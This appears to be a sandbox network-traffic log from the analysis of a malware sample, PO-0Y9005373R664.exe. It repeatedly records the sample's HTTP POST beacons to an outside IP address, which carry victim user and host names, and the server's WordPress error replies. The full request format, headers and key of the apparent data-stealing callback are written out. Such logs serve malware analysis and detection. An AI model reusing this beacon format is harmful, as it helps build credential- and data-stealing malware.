Aug 29, 2024 12:04:19.961385965 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:04:19.961400032 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	49756	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:20.109291077 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:20.114259005 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:22.379086971 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:20 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:22.379106998 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:04:22.379118919 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:04:22.379134893 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	49757	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:22.529500961 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:22.534398079 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:25.029134035 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:23 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:25.029160976 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:04:25.029174089 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	49758	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:25.186475992 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:25.191401958 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:27.434865952 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:25 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:27.434894085 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:04:27.434905052 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:04:27.434916973 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	49759	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:27.589426041 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:27.594258070 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:29.944237947 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:28 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:29.944261074 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:04:29.944267988 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	49760	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:30.094477892 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:30.099349976 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:32.405469894 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:30 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:32.405492067 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:04:32.405522108 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	49761	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:32.561924934 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:32.566845894 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
